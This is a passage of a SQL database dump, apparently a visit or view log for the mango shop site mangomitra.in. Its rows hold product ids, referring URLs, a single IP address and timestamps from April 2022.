12:12:51'),(837,0,1,0,0,21,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-04-02 13:16:04'),(838,9,0,0,36,1,'https://mangomitra.in/store/mainstore/','3.110.242.160','','','','2022-04-02 13:16:21'),(839,0,0,1,1097,21,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-04-02 13:16:35'),(840,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-04-06 10:00:35'),(841,9,0,0,77,1,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-04-06 10:01:00'),(842,9,0,0,35,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-04-06 10:01:18'),(843,0,0,1,1145,21,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-04-06 10:01:24'),(844,1,0,0,0,21,'https://mangomitra.in/product/combo-pack-5kg/','3.110.242.160','','','','2022-04-06 10:03:27'),(845,0,1,0,0,21,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-04-06 10:03:37'),(846,1,0,0,0,21,'','3.110.242.160','','','','2022-04-09 21:30:28'),(847,1,0,0,0,21,'','3.110.242.160','','','','2022-04-09 21:33:27'),(848,1,0,0,0,21,'','3.110.242.160','','','','2022-04-09 21:34:00'),(849,0,1,0,0,25,'','3.110.242.160','','','','2022-04-09 21:37:15'),(850,1,0,0,0,21,'','3.110.242.160','','','','2022-04-09 21:49:56'),(851,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:00:28'),(852,9,0,0,15,1,'','3.110.242.160','','','','2022-04-09 22:01:01'),(853,9,0,0,85,1,'','3.110.242.160','','','','2022-04-09 22:04:02'),(854,9,0,0,128,1,'','3.110.242.160','','','','2022-04-09 22:05:56'),(855,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:06:28'),(856,9,0,0,35,1,'','3.110.242.160','','','','2022-04-09 22:06:44'),(857,9,0,0,36,1,'','3.110.242.160','','','','2022-04-09 22:07:15'),(858,9,0,0,127,1,'','3.110.242.160','','','','2022-04-09 22:08:51'),(859,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:09:07'),(860,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:09:24'),(861,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:09:40'),(862,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:09:56'),(863,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:10:12'),(864,0,0,1,1069,21,'','3.110.242.160','','','','2022-04-09 22:10:28'),(865,9,0,0,35,1,'','3.110.242.160','','','','2022-04-09 22:11:00'),(866,0,0,1,1088,21,'','3.110.242.160','','','','2022-04-09 22:11:17'),(867,0,0,1,1082,21,'','3.110.242.160','','','','2022-04-09 22:11:49'),(868,1,0,0,0,21,'','3.110.242.160','','','','2022-04-09 22:12:21'),(869,1,0,0,0,21,'','3.110.242.160','','','','2022-04-09 22:12:38'),(870,1,0,0,0,21,'','3.110.242.160','','','','2022-04-09 22:12:54'),(871,9,0,0,79,1,'','3.110.242.160','','','','2022-04-09 22:13:10'),(872,9,0,0,78,1,'','3.110.242.160','','','','2022-04-09 22:13:26'),(873,9,0,0,35,1,'','3.110.242.160','','','','2022-04-09 22:13:59'),(874,9,0,0,80,1,'','3.110.242.160','','','','2022-04-09 22:14:15'),(875,0,0,1,1097,21,'','3.110.242.160','','','','2022-04-09 22:14:47'),(876,0,0,1,1263,21,'','3.110.242.160','','','','2022-04-09 22:15:03'),(877,0,0,1,1089,21,'','3.110.242.160','','','','2022-04-09 22:15:20'),(878,0,0,1,1083,21,'','3.110.242.160','','','','2022-04-09 22:15:36'),(879,0,0,1,1170,21,'','3.110.242.160','','','','2022-04-09 22:16:08'),(880,9,0,0,129,1,'','3.110.242.160','','','','2022-04-09 22:16:24'),(881,0,0,1,1159,21,'','3.110.242.160','','','','2022-04-09 22:16:40'),(882,9,0,0,38,1,'','3.110.242.160','','','','2022-04-09 22:16:56'),(883,9,0,0,77,1,'','3.110.242.160','','','','2022-04-09 22:17:28'),(884,9,0,0,76,1,'','3.110.242.160','','','','2022-04-09 22:17:44'),(885,9,0,0,130,1,'','3.110.242.160','','','','2022-04-09 22:18:48'),(886,9,0,0,37,1,'','3.110.242.160','','','','2022-04-09 22:19:20'),(887,0,0,1,1145,21,'','3.110.242.160','','','','2022-04-09 22:19:37'),(888,0,0,1,1091,21,'','3.110.242.160','','','','2022-04-09 22:19:53'),(889,0,0,1,1125,21,'','3.110.242.160','','','','2022-04-09 22:20:09'),(890,0,0,1,1126,21,'','3.110.242.160','','','','2022-04-09 22:20:26'),(891,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:20:59'),(892,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:21:15'),(893,0,0,1,1092,21,'','3.110.242.160','','','','2022-04-09 22:21:31'),(894,0,0,1,1129,21,'','3.110.242.160','','','','2022-04-09 22:21:47'),(895,0,0,1,1128,21,'','3.110.242.160','','','','2022-04-09 22:22:03'),(896,0,0,1,1169,21,'','3.110.242.160','','','','2022-04-09 22:22:19'),(897,0,0,1,1146,21,'','3.110.242.160','','','','2022-04-09 22:23:23'),(898,0,0,1,1132,21,'','3.110.242.160','','','','2022-04-09 22:23:39'),(899,0,0,1,1131,21,'','3.110.242.160','','','','2022-04-09 22:23:56'),(900,0,0,1,1093,21,'','3.110.242.160','','','','2022-04-09 22:24:12'),(901,0,0,1,1119,21,'','3.110.242.160','','','','2022-04-09 22:24:28'),(902,0,0,1,1100,21,'','3.110.242.160','','','','2022-04-09 22:24:44'),(903,0,0,1,1095,21,'','3.110.242.160','','','','2022-04-09 22:25:00'),(904,0,0,1,1140,21,'','3.110.242.160','','','','2022-04-09 22:25:16'),(905,0,0,1,1141,21,'','3.110.242.160','','','','2022-04-09 22:25:33'),(906,0,0,1,1264,21,'','3.110.242.160','','','','2022-04-09 22:25:49'),(907,0,0,1,1167,21,'','3.110.242.160','','','','2022-04-09 22:26:05'),(908,0,0,1,1122,21,'','3.110.242.160','','','','2022-04-09 22:26:21'),(909,0,0,1,1123,21,'','3.110.242.160','','','','2022-04-09 22:26:37'),(910,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:26:54'),(911,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:27:10'),(912,0,0,1,1135,21,'','3.110.242.160','','','','2022-04-09 22:27:26'),(913,0,0,1,1134,21,'','3.110.242.160','','','','2022-04-09 22:27:42'),(914,0,0,1,1120,21,'','3.110.242.160','','','','2022-04-09 22:27:58'),(915,0,0,1,1138,21,'','3.110.242.160','','','','2022-04-09 22:28:14'),(916,0,0,1,1137,21,'','3.110.242.160','','','','2022-04-09 22:28:31'),(917,0,0,1,1144,21,'','3.110.242.160','','','','2022-04-09 22:28:47'),(918,0,0,1,1143,21,'','3.110.242.160','','','','2022-04-09 22:29:03'),(919,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:29:19'),(920,9,0,0,35,1,'','3.110.242.160','','','','2022-04-09 22:29:35'),(921,9,0,0,35,1,'','3.110.242.160','','','','2022-04-09 22:29:52'),(922,9,0,0,35,1,'','3.110.242.160','','','','2022-04-09 22:30:08'),(923,0,1,0,0,21,'','3.110.242.160','','','','2022-04-09 22:30:24'),(924,0,0,1,1161,21,'','3.110.242.160','','','','2022-04-09 22:30:41'),(925,9,0,0,130,1,'','3.110.242.160','','','','2022-04-09 22:30:57'),(926,9,0,0,130,1,'','3.110.242.160','','','','2022-04-09 22:31:14'),(927,9,0,0,130,1,'','3.110.242.160','','','','2022-04-09 22:31:30'),(928,0,0,1,1263,21,'','3.110.242.160','','','','2022-04-09 22:31:46'),(929,0,0,1,1263,21,'','3.110.242.160','','','','2022-04-09 22:32:02'),(930,0,0,1,1086,21,'','3.110.242.160','','','','2022-04-09 22:32:18'),(931,0,0,1,1087,21,'','3.110.242.160','','','','2022-04-09 22:32:34'),(932,0,0,1,1084,21,'','3.110.242.160','','','','2022-04-09 22:32:51'),(933,0,0,1,1085,21,'','3.110.242.160','','','','2022-04-09 22:33:07'),(934,0,0,1,1114,21,'','3.110.242.160','','','','2022-04-09 22:33:23'),(935,0,0,1,1116,21,'','3.110.242.160','','','','2022-04-09 22:33:39'),(936,0,0,1,1111,21,'','3.110.242.160','','','','2022-04-09 22:33:55'),(937,0,0,1,1289,21,'','3.110.242.160','','','','2022-04-09 22:34:12'),(938,0,0,1,1287,21,'','3.110.242.160','','','','2022-04-09 22:34:28'),(939,0,0,1,1288,21,'','3.110.242.160','','','','2022-04-09 22:34:44'),(940,0,0,1,1163,21,'','3.110.242.160','','','','2022-04-09 22:35:00'),(941,0,0,1,1102,21,'','3.110.242.160','','','','2022-04-09 22:35:16'),(942,0,0,1,1109,21,'','3.110.242.160','','','','2022-04-09 22:35:32'),(943,0,0,1,1117,21,'','3.110.242.160','','','','2022-04-09 22:35:49'),(944,0,0,1,1107,21,'','3.110.242.160','','','','2022-04-09 22:36:05'),(945,0,0,1,1165,21,'','3.110.242.160','','','','2022-04-09 22:36:21'),(946,0,0,1,1123,21,'https://mangomitra.in/','3.110.242.160','','','','2022-04-10 03:14:12'),(947,9,0,0,35,1,'https://mangomitra.in/product/neelam-mango-5kg/','3.110.242.160','','','','2022-04-10 03:14:34'),(948,9,0,0,130,1,'','3.110.242.160','','','','2022-04-10 11:13:02'),(949,9,0,0,35,1,'','3.110.242.160','','','','2022-04-10 11:13:04'),(950,9,0,0,36,1,'','3.110.242.160','','','','2022-04-10 11:13:05'),(951,9,0,0,37,1,'','3.110.242.160','','','','2022-04-10 11:13:06'),(952,9,0,0,38,1,'','3.110.242.160','','','','2022-04-10 11:13:07'),(953,9,0,0,77,1,'','3.110.242.160','','','','2022-04-10 11:13:08'),(954,0,0,1,1287,21,'','3.110.242.160','','','','2022-04-10 11:13:11'),(955,0,0,1,1289,21,'','3.110.242.160','','','','2022-04-10 11:13:12'),(956,0,0,1,1288,21,'','3.110.242.160','','','','2022-04-10 11:13:13'),(957,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-04-11 08:20:53'),(958,0,1,0,0,21,'https://mangomitra.in/product/banginapalli-mango-3kg/','3.110.242.160','','','','2022-04-11 08:21:23'),(959,0,1,0,0,21,'https://www.google.com/','3.110.242.160','','','','2022-04-11 08:21:25'),(960,1,0,0,0,21,'https://mangomitra.in/product/banginapalli-mango-3kg/','3.110.242.160','','','','2022-04-11 08:21:35'),(961,1,0,0,0,21,'','3.110.242.160','','','','2022-04-11 12:02:51'),(962,0,1,0,0,21,'','3.110.242.160','','','','2022-04-11 12:06:10'),(963,9,0,0,130,1,'https://mangomitra.in/','3.110.242.160','','','','2022-04-11 13:41:39'),(964,0,0,1,1287,21,'https://mangomitra.in/product-category/deal-of-the-day/','3.110.242.160','','','','2022-04-11 13:43:44'),(965,0,0,1,1085,21,'https://mangomitra.in/product/ratnagiri-alphonso-1-dozen/','3.110.242.160','','','','2022-04-11 13:53:26'),(966,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-04-11 13:57:42'),(967,0,0,1,1116,21,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-04-11 13:58:35'),(968,9,0,0,37,1,'https://mangomitra.in/product/banginapalli-mango-5kg/','3.110.242.160','','','','2022-04-11 14:01:05'),(969,9,0,0,38,1,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-04-11 14:02:23'),(970,0,1,0,0,21,'https://mangomitra.in/product-category/jams-and-squashes/','3.110.242.160','','','','2022-04-11 14:02:42'),(971,0,0,1,1084,21,'https://mangomitra.in/store/mainstore/','3.110.242.160','','','','2022-04-11 14:04:15'),(972,9,0,0,77,1,'https://mangomitra.in/product/devagad-alphonso-3kg/','3.110.242.160','','','','2022-04-11 14:04:39'),(973,1,0,0,0,21,'','3.110.242.160','','','','2022-04-11 18:31:54'),(974,0,0,1,1069,21,'','3.110.242.160','','','','2022-04-11 18:31:57'),(975,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-04-12 12:58:18'),(976,9,0,0,130,1,'https://mangomitra.in/','3.110.242.160','','','','2022-04-12 16:09:47'),(977,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-04-14 12:21:27'),(978,9,0,0,128,1,'https://mangomitra.in/','3.110.242.160','','','','2022-04-14 12:21:42'),(979,9,0,0,129,1,'https://mangomitra.in/','3.110.242.160','','','','2022-04-14 12:21:53'),(980,0,0,1,1097,21,'','3.110.242.160','','','','2022-04-17 10:19:49'),(981,0,0,1,1287,21,'','3.110.242.160','','','','2022-04-17 10:19:50'),(982,0,0,1,1167,21,'','3.110.242.160','','','','2022-04-17 10:19:50'),(983,0,0,1,1165,21,'','3.110.242.160','','','','2022-04-17 10:19:51'),(984,9,0,0,37,1,'','3.110.242.160','','','','2022-04-17 10:19:51'),(985,9,0,0,35,1,'','3.110.242.160','','','','2022-04-17 10:19:52'),(986,9,0,0,77,1,'','3.110.242.160','','','','2022-04-17 10:19:52'),(987,0,0,1,1161,21,'','3.110.242.160','','','','2022-04-17 10:19:52'),(988,0,0,1,1159,21,'','3.110.242.160','','','','2022-04-17 10:19:53'),(989,0,0,1,1288,21,'','3.110.242.160','','','','2022-04-17 10:19:53'),(990,0,0,1,1264,21,'','3.110.242.160','','','','2022-04-17 10:19:54'),(991,0,0,1,1163,21,'','3.110.242.160','','','','2022-04-17 10:19:55'),(992,0,0,1,1263,21,'','3.110.242.160','','','','2022-04-17 10:19:55'),(993,0,0,1,1114,21,'','3.110.242.160','','','','2022-04-17 10:19:56'),(994,0,0,1,1116,21,'','3.110.242.160','','','','2022-04-17 10:19:56'),(995,0,0,1,1114,21,'https://www.google.com','3.110.242.160','','','','2022-04-20 00:04:58'),(996,0,0,1,1116,21,'https://www.google.com','3.110.242.160','','','','2022-04-20 00:05:00'),(997,0,0,1,1097,21,'https://www.google.com','3.110.242.160','','','','2022-04-20 00:05:01'),(998,0,0,1,1263,21,'https://www.google.com','3.110.242.160','','','','2022-04-20 00:05:03'),(999,0,0,1,1287,21,'https://www.google.com','3.110.242.160','','','','2022-04-20 00:05:04'),(1000,0,0,1,1288,21,'https://www.google.com','3.110.242.160','','','','2022-04-20 00:05:06'),(1001,1,0,0,0,21,'','3.110.242.160','','','','2022-04-21 15:02:54'),(1002,1,0,0,0,21,'','3.110.242.160','','','','2022-04-21 15:05:52'),(1003,1,0,0,0,21,'','3.110.242.160','','','','2022-04-21 15:06:25'),(1004,0,1,0,0,25,'','3.110.242.160','','','','2022-04-21 15:09:39'),(1005,1,0,0,0,21,'','3.110.242.160','','','','2022-04-21 15:21:47'),(1006,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 15:32:14'),(1007,9,0,0,15,1,'','3.110.242.160','','','','2022-04-21 15:32:47'),(1008,9,0,0,85,1,'','3.110.242.160','','','','2022-04-21 15:35:48'),(1009,9,0,0,128,1,'','3.110.242.160','','','','2022-04-21 15:37:42'),(1010,9,0,0,35,1,'','3.110.242.160','','','','2022-04-21 15:38:15'),(1011,9,0,0,36,1,'','3.110.242.160','','','','2022-04-21 15:38:47'),(1012,9,0,0,127,1,'','3.110.242.160','','','','2022-04-21 15:40:25'),(1013,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 15:40:42'),(1014,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 15:40:58'),(1015,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 15:41:15'),(1016,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 15:41:31'),(1017,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 15:41:48'),(1018,0,0,1,1069,21,'','3.110.242.160','','','','2022-04-21 15:42:04'),(1019,9,0,0,35,1,'','3.110.242.160','','','','2022-04-21 15:42:37'),(1020,0,0,1,1088,21,'','3.110.242.160','','','','2022-04-21 15:42:53'),(1021,0,0,1,1082,21,'','3.110.242.160','','','','2022-04-21 15:43:26'),(1022,1,0,0,0,21,'','3.110.242.160','','','','2022-04-21 15:43:59'),(1023,1,0,0,0,21,'','3.110.242.160','','','','2022-04-21 15:44:15'),(1024,1,0,0,0,21,'','3.110.242.160','','','','2022-04-21 15:44:32'),(1025,9,0,0,79,1,'','3.110.242.160','','','','2022-04-21 15:44:48'),(1026,9,0,0,78,1,'','3.110.242.160','','','','2022-04-21 15:45:05'),(1027,9,0,0,35,1,'','3.110.242.160','','','','2022-04-21 15:45:37'),(1028,9,0,0,80,1,'','3.110.242.160','','','','2022-04-21 15:45:54'),(1029,0,0,1,1097,21,'','3.110.242.160','','','','2022-04-21 15:46:27'),(1030,0,0,1,1263,21,'','3.110.242.160','','','','2022-04-21 15:46:43'),(1031,0,0,1,1089,21,'','3.110.242.160','','','','2022-04-21 15:47:00'),(1032,0,0,1,1083,21,'','3.110.242.160','','','','2022-04-21 15:47:17'),(1033,0,0,1,1170,21,'','3.110.242.160','','','','2022-04-21 15:47:49'),(1034,9,0,0,129,1,'','3.110.242.160','','','','2022-04-21 15:48:06'),(1035,0,0,1,1159,21,'','3.110.242.160','','','','2022-04-21 15:48:22'),(1036,9,0,0,38,1,'','3.110.242.160','','','','2022-04-21 15:48:39'),(1037,9,0,0,77,1,'','3.110.242.160','','','','2022-04-21 15:49:12'),(1038,9,0,0,76,1,'','3.110.242.160','','','','2022-04-21 15:49:28'),(1039,9,0,0,130,1,'','3.110.242.160','','','','2022-04-21 15:50:33'),(1040,9,0,0,37,1,'','3.110.242.160','','','','2022-04-21 15:51:06'),(1041,0,0,1,1145,21,'','3.110.242.160','','','','2022-04-21 15:51:23'),(1042,0,0,1,1091,21,'','3.110.242.160','','','','2022-04-21 15:51:39'),(1043,0,0,1,1125,21,'','3.110.242.160','','','','2022-04-21 15:51:56'),(1044,0,0,1,1126,21,'','3.110.242.160','','','','2022-04-21 15:52:13'),(1045,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 15:52:46'),(1046,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 15:53:02'),(1047,0,0,1,1092,21,'','3.110.242.160','','','','2022-04-21 15:53:19'),(1048,0,0,1,1129,21,'','3.110.242.160','','','','2022-04-21 15:53:35'),(1049,0,0,1,1128,21,'','3.110.242.160','','','','2022-04-21 15:53:52'),(1050,0,0,1,1169,21,'','3.110.242.160','','','','2022-04-21 15:54:08'),(1051,0,0,1,1146,21,'','3.110.242.160','','','','2022-04-21 15:55:13'),(1052,0,0,1,1132,21,'','3.110.242.160','','','','2022-04-21 15:55:30'),(1053,0,0,1,1131,21,'','3.110.242.160','','','','2022-04-21 15:55:46'),(1054,0,0,1,1093,21,'','3.110.242.160','','','','2022-04-21 15:56:03'),(1055,0,0,1,1119,21,'','3.110.242.160','','','','2022-04-21 15:56:19'),(1056,0,0,1,1100,21,'','3.110.242.160','','','','2022-04-21 15:56:36'),(1057,0,0,1,1095,21,'','3.110.242.160','','','','2022-04-21 15:56:52'),(1058,0,0,1,1140,21,'','3.110.242.160','','','','2022-04-21 15:57:09'),(1059,0,0,1,1141,21,'','3.110.242.160','','','','2022-04-21 15:57:25'),(1060,0,0,1,1264,21,'','3.110.242.160','','','','2022-04-21 15:57:42'),(1061,0,0,1,1167,21,'','3.110.242.160','','','','2022-04-21 15:57:59'),(1062,0,0,1,1122,21,'','3.110.242.160','','','','2022-04-21 15:58:15'),(1063,0,0,1,1123,21,'','3.110.242.160','','','','2022-04-21 15:58:32'),(1064,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 15:58:48'),(1065,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 15:59:05'),(1066,0,0,1,1135,21,'','3.110.242.160','','','','2022-04-21 15:59:21'),(1067,0,0,1,1134,21,'','3.110.242.160','','','','2022-04-21 15:59:38'),(1068,0,0,1,1120,21,'','3.110.242.160','','','','2022-04-21 15:59:54'),(1069,0,0,1,1138,21,'','3.110.242.160','','','','2022-04-21 16:00:11'),(1070,0,0,1,1137,21,'','3.110.242.160','','','','2022-04-21 16:00:27'),(1071,0,0,1,1144,21,'','3.110.242.160','','','','2022-04-21 16:00:44'),(1072,0,0,1,1143,21,'','3.110.242.160','','','','2022-04-21 16:01:00'),(1073,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 16:01:17'),(1074,9,0,0,35,1,'','3.110.242.160','','','','2022-04-21 16:01:34'),(1075,9,0,0,35,1,'','3.110.242.160','','','','2022-04-21 16:01:51'),(1076,9,0,0,35,1,'','3.110.242.160','','','','2022-04-21 16:02:07'),(1077,0,1,0,0,21,'','3.110.242.160','','','','2022-04-21 16:02:24'),(1078,0,0,1,1161,21,'','3.110.242.160','','','','2022-04-21 16:02:40'),(1079,9,0,0,130,1,'','3.110.242.160','','','','2022-04-21 16:02:57'),(1080,9,0,0,130,1,'','3.110.242.160','','','','2022-04-21 16:03:13'),(1081,9,0,0,130,1,'','3.110.242.160','','','','2022-04-21 16:03:30'),(1082,0,0,1,1263,21,'','3.110.242.160','','','','2022-04-21 16:03:47'),(1083,0,0,1,1263,21,'','3.110.242.160','','','','2022-04-21 16:04:03'),(1084,0,0,1,1086,21,'','3.110.242.160','','','','2022-04-21 16:04:20'),(1085,0,0,1,1087,21,'','3.110.242.160','','','','2022-04-21 16:04:36'),(1086,0,0,1,1084,21,'','3.110.242.160','','','','2022-04-21 16:04:53'),(1087,0,0,1,1085,21,'','3.110.242.160','','','','2022-04-21 16:05:10'),(1088,0,0,1,1114,21,'','3.110.242.160','','','','2022-04-21 16:05:26'),(1089,0,0,1,1116,21,'','3.110.242.160','','','','2022-04-21 16:05:43'),(1090,0,0,1,1111,21,'','3.110.242.160','','','','2022-04-21 16:05:59'),(1091,0,0,1,1289,21,'','3.110.242.160','','','','2022-04-21 16:06:16'),(1092,0,0,1,1287,21,'','3.110.242.160','','','','2022-04-21 16:06:32'),(1093,0,0,1,1288,21,'','3.110.242.160','','','','2022-04-21 16:06:49'),(1094,0,0,1,1163,21,'','3.110.242.160','','','','2022-04-21 16:07:06'),(1095,0,0,1,1102,21,'','3.110.242.160','','','','2022-04-21 16:07:23'),(1096,0,0,1,1109,21,'','3.110.242.160','','','','2022-04-21 16:07:40'),(1097,0,0,1,1117,21,'','3.110.242.160','','','','2022-04-21 16:07:56'),(1098,0,0,1,1107,21,'','3.110.242.160','','','','2022-04-21 16:08:13'),(1099,0,0,1,1165,21,'','3.110.242.160','','','','2022-04-21 16:08:31'),(1100,9,0,0,127,1,'https://mangomitra.in/bulk-booking/','3.110.242.160','','','','2022-04-21 17:50:00'),(1101,9,0,0,128,1,'https://mangomitra.in/bulk-booking/','3.110.242.160','','','','2022-04-21 17:50:23'),(1102,9,0,0,129,1,'https://mangomitra.in/bulk-booking/','3.110.242.160','','','','2022-04-21 17:50:32'),(1103,9,0,0,35,1,'https://mangomitra.in/brand/srinivasapura/','3.110.242.160','','','','2022-04-21 17:50:44'),(1104,0,0,1,1264,21,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-04-21 17:52:50'),(1105,0,0,1,1131,21,'https://mangomitra.in/product-category/mangoes/page/2/','3.110.242.160','','','','2022-04-21 17:55:44'),(1106,0,0,1,1287,21,'https://mangomitra.in/product/raspuri-mango-3kg/','3.110.242.160','','','','2022-04-21 17:56:08'),(1107,0,0,1,1084,21,'https://mangomitra.in/product/ratnagiri-alphonso-1-dozen/','3.110.242.160','','','','2022-04-21 17:56:25'),(1108,0,0,1,1126,21,'https://mangomitra.in/product/devagad-alphonso-3kg/','3.110.242.160','','','','2022-04-21 17:56:34'),(1109,0,0,1,1140,21,'https://mangomitra.in/product/hapus-mango-5kg/','3.110.242.160','','','','2022-04-21 17:56:47'),(1110,0,0,1,1132,21,'https://mangomitra.in/product/badami-mango-3kg/','3.110.242.160','','','','2022-04-21 17:57:27'),(1111,0,0,1,1128,21,'https://mangomitra.in/product/raspuri-mango-5kg/','3.110.242.160','','','','2022-04-21 17:58:07'),(1112,0,0,1,1088,21,'https://mangomitra.in/product/sendura-mango-3kg/','3.110.242.160','','','','2022-04-21 17:58:16'),(1113,0,0,1,1087,21,'https://mangomitra.in/product/kesar-3kg/','3.110.242.160','','','','2022-04-21 17:58:26'),(1114,0,0,1,1137,21,'https://mangomitra.in/product/ratnagiri-alphonso-5kg/','3.110.242.160','','','','2022-04-21 17:58:36'),(1115,0,0,1,1086,21,'https://mangomitra.in/product/malgova-mango-3kg/','3.110.242.160','','','','2022-04-21 17:58:52'),(1116,0,0,1,1287,21,'','3.110.242.160','','','','2022-04-26 17:58:32'),(1117,0,0,1,1126,21,'','3.110.242.160','','','','2022-04-26 17:58:34'),(1118,0,0,1,1165,21,'','3.110.242.160','','','','2022-04-26 17:58:35'),(1119,0,0,1,1109,21,'','3.110.242.160','','','','2022-04-26 17:58:37'),(1120,0,0,1,1289,21,'','3.110.242.160','','','','2022-04-26 17:58:38'),(1121,0,0,1,1167,21,'','3.110.242.160','','','','2022-04-26 17:58:40'),(1122,9,0,0,129,1,'','3.110.242.160','','','','2022-04-26 17:58:41'),(1123,0,0,1,1264,21,'','3.110.242.160','','','','2022-04-26 17:58:46'),(1124,0,0,1,1161,21,'','3.110.242.160','','','','2022-04-26 17:58:48'),(1125,0,0,1,1138,21,'','3.110.242.160','','','','2022-04-26 17:58:50'),(1126,9,0,0,35,1,'','3.110.242.160','','','','2022-04-26 17:58:51'),(1127,9,0,0,77,1,'','3.110.242.160','','','','2022-04-26 17:58:53'),(1128,0,0,1,1169,21,'','3.110.242.160','','','','2022-04-26 17:58:54'),(1129,0,0,1,1263,21,'','3.110.242.160','','','','2022-04-26 17:58:57'),(1130,0,0,1,1120,21,'','3.110.242.160','','','','2022-04-26 17:58:58'),(1131,0,0,1,1125,21,'','3.110.242.160','','','','2022-04-26 17:59:00'),(1132,0,0,1,1128,21,'','3.110.242.160','','','','2022-04-26 17:59:01'),(1133,0,0,1,1087,21,'','3.110.242.160','','','','2022-04-26 20:37:42'),(1134,0,0,1,1131,21,'','3.110.242.160','','','','2022-04-26 20:37:46'),(1135,0,0,1,1129,21,'','3.110.242.160','','','','2022-04-26 20:37:48'),(1136,1,0,0,0,21,'','3.110.242.160','','','','2022-04-26 20:37:49'),(1137,9,0,0,127,1,'','3.110.242.160','','','','2022-04-26 20:37:50'),(1138,9,0,0,128,1,'','3.110.242.160','','','','2022-04-26 20:37:51'),(1139,0,0,1,1107,21,'','3.110.242.160','','','','2022-04-26 20:37:53'),(1140,0,0,1,1144,21,'','3.110.242.160','','','','2022-04-26 20:37:56'),(1141,0,0,1,1097,21,'','3.110.242.160','','','','2022-04-26 20:37:57'),(1142,0,0,1,1132,21,'','3.110.242.160','','','','2022-04-26 20:37:58'),(1143,0,0,1,1288,21,'','3.110.242.160','','','','2022-04-26 20:37:59'),(1144,0,0,1,1140,21,'','3.110.242.160','','','','2022-04-26 20:38:00'),(1145,9,0,0,35,1,'','3.110.242.160','','','','2022-04-26 20:38:02'),(1146,0,0,1,1141,21,'','3.110.242.160','','','','2022-04-26 20:38:03'),(1147,0,0,1,1091,21,'','3.110.242.160','','','','2022-04-26 20:38:04'),(1148,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-04-27 09:35:06'),(1149,9,0,0,130,1,'https://mangomitra.in/about-us/','3.110.242.160','','','','2022-04-27 09:37:37'),(1150,9,0,0,35,1,'https://mangomitra.in/product-category/deal-of-the-day/?orderby=popularity','3.110.242.160','','','','2022-04-27 09:42:44'),(1151,0,0,1,1088,21,'','3.110.242.160','','','','2022-04-27 17:07:28'),(1152,0,0,1,1143,21,'','3.110.242.160','','','','2022-04-27 17:07:29'),(1153,9,0,0,35,1,'','3.110.242.160','','','','2022-04-27 17:07:31'),(1154,9,0,0,38,1,'','3.110.242.160','','','','2022-04-27 17:07:32'),(1155,1,0,0,0,21,'','3.110.242.160','','','','2022-04-27 17:07:33'),(1156,0,0,1,1093,21,'','3.110.242.160','','','','2022-04-27 17:07:34'),(1157,0,0,1,1137,21,'','3.110.242.160','','','','2022-04-27 17:07:35'),(1158,0,0,1,1082,21,'','3.110.242.160','','','','2022-04-27 17:07:36'),(1159,0,1,0,0,21,'','3.110.242.160','','','','2022-04-27 17:07:39'),(1160,0,0,1,1100,21,'','3.110.242.160','','','','2022-04-27 17:07:40'),(1161,1,0,0,0,21,'','3.110.242.160','','','','2022-04-27 17:07:41'),(1162,0,0,1,1122,21,'','3.110.242.160','','','','2022-04-27 17:07:46'),(1163,0,0,1,1123,21,'','3.110.242.160','','','','2022-04-27 17:07:47'),(1164,9,0,0,85,1,'','3.110.242.160','','','','2022-04-27 17:07:49'),(1165,1,0,0,0,21,'','3.110.242.160','','','','2022-04-27 17:07:50'),(1166,1,0,0,0,21,'','3.110.242.160','','','','2022-04-27 19:29:32'),(1167,0,0,1,1089,21,'','3.110.242.160','','','','2022-04-27 22:09:07'),(1168,0,0,1,1069,21,'','3.110.242.160','','','','2022-04-27 22:09:09'),(1169,0,0,1,1134,21,'','3.110.242.160','','','','2022-04-27 22:09:10'),(1170,0,0,1,1095,21,'','3.110.242.160','','','','2022-04-27 22:09:13'),(1171,0,0,1,1119,21,'','3.110.242.160','','','','2022-04-27 22:09:14'),(1172,9,0,0,35,1,'','3.110.242.160','','','','2022-04-27 22:09:17'),(1173,0,0,1,1159,21,'','3.110.242.160','','','','2022-04-27 22:09:19'),(1174,0,1,0,0,21,'','3.110.242.160','','','','2022-04-27 22:09:20'),(1175,0,0,1,1135,21,'','3.110.242.160','','','','2022-04-27 22:09:24'),(1176,0,0,1,1163,21,'','3.110.242.160','','','','2022-04-27 22:09:26'),(1177,0,1,0,0,21,'','3.110.242.160','','','','2022-04-27 